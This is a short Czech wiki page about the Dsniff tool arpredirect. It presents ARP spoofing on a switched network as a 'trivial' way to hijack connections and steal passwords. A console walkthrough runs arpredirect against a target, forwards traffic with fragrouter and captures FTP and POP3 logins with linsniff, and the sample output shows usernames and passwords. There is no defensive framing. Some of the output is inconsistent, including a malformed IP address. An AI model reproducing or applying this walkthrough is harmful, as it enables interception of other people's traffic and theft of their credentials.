Arpredirect

Z AMP Sec
Přejít na: navigace, hledání

arpredirect je famózním nástrojem a Dsniff impelmentací oblíbeného útoku pro získáni hesel, přihlašovacích údajů nebo manipulaci provozu v přepínané (switch) síti, v Linux aplikaci Dsniff. Ovládaní aplikace, únos spojení a získaní hesel je triviální. Stačí k tomu několik málo příkazu v konzole.

[air@dump @ ~] ping [počítač A]
PING 10.100.52.1 from 10.100.52.103 : 56(84) bytes of data.
64 bytes from 10.100.52.1 L icmp_seq=0 ttl=128 time=0.3 ms
[air@dump @ ~] ping [počítač B]
PING 10.100.52.3 from 10.100.522.103 : 56(84) bytes of data
64 bytes from 10.100.52.103: icmp_seq=0 ttl=255 time=5.2 ms
[air@dump @ ~] arpredirect -t 10.100.52.3 10.100.52.103
intercepting traffic from 10.100.52.3 to 10.100.52.103 (^c to exit)...

Tato kombinace příkazů spustí ARP Redirect a přesměruje veškerý síťový provoz pro bránu (10.100.52.1) na IP adresu 10.100.52.103. Toto je způsobeno arpredirect -em který změní vychozí bránu. Pokud b0x používá Kernel-level IP forwarding můžeme použít další nástroj fragrouter která pracuje na úrovní jádra (kernel level) a může odesílat ICMP redirekty bez toho aby byli zahozeny. Fragrouter je dostupný na stránkach packetstormsecurity.org. Aplikace se ovláda stejně easy jako arpredirect. Příklad pro přesměrování provozu použitím přepínače (volby) -B1 v nástroji fragrouter:

[air@dump @ ~] fragrouter -B1
.....
<output trimmed>

Nakonec stačí spustit analyzér paketů pro zachycení získaných dat.

[air@dump @ ~] linsniff
Linux Sniffer Beta v1.0
Log opened.
---------[SYN] (slot 1)
10.100.52.125 => 192.168.1.52 [21]
USER airdump
PASS hu.ha.heslo.(olo)
PORT 10,1,1,18,8,35
NLST
QUIT
---------[SYN] (slot 1)
10.100.52.125 => 192.168.1.52 [110]
USER sasanka@airdump.net PASS heslo
[FIN] (1)

Články v kategorii síťová bezpečnost a Hacking